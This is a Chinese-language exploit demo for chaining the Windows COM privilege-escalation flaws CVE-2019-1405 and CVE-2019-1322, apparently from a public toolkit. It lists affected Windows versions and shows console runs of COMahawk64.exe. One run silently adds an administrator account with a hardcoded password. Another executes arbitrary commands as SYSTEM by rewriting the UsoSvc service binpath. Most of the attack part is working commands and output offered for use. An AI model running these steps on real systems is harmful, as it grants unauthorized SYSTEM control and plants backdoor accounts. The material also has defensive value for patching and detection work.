漏洞介紹
由NCC Group研究人員所發現的兩個通過COM本地服務進行非法提權的漏洞。第一個漏洞CVE-2019-1405是COM服務中的一個邏輯錯誤,可讓本地普通用戶以LOCAL SERVICE身份執行任意命令。第二個漏洞CVE-2019-1322是一個簡單的服務配置錯誤,可讓本地SERVICE組中的任何用戶重新配置以SYSTEM權限運行的服務(此漏洞也被其他研究人員發現)。當以上兩個漏洞結合在一起時,就允許本地普通用戶以SYSTEM權限執行任意命令。
全面檢查了一些Windows服務,發現以LOCAL SERVICE或NETWORK SERVICE運行的所有用戶都可以執行這種攻擊。其中就包括前面我們提到的UPnP Device Host服務,這樣我們就能以本地任意用戶身份,結合使用CVE-2019-1405及CVE-2019-1322這兩個漏洞,成功在Windows 10(1803到1903)系統上將權限提升至SYSTEM用戶。
漏洞版本
Vendor Product Versions
Microsoft Windows 10 -, 1607, 1709, 1803, 1809, 1903
Microsoft Windows 7 -
Microsoft Windows 8.1 -
Microsoft Windows Rt 8.1 -
Microsoft Windows Server 2008 -, R2
Microsoft Windows Server 2012 -, R2
Microsoft Windows Server 2016 -, 1803, 1903
Microsoft Windows Server 2019 -
默認提權
C:\Users\null\Desktop>COMahawk64.exe
[\] Progress: 1/9 2/9 3/9 4/9 5/9 6/9 7/9 8/9 9/9
[+] Hopefully k8gege:K8gege520 is added as an admin.
C:\Users\null\Desktop>net user
\\DESKTOP-3F42O5D 的用戶帳戶
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
k8gege null WDAGUtilityAccount
命令成功完成。
指定命令
C:\Users\null\Desktop>COMahawk64.exe "net user k8gege K8gege123? /add"
[+] Executing command [ sc config UsoSvc binpath= "cmd.exe /c net user k8gege K8gege123? /add" ]
[\] Progress: 1/6 2/6 3/6 4/6 5/6 6/6
[+] Command executed.
C:\Users\null\Desktop>net user
\\DESKTOP-3F42O5D 的用戶帳戶
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
k8gege null WDAGUtilityAccount
命令成功完成。
Win10提權
Teston Win10 X64 1803
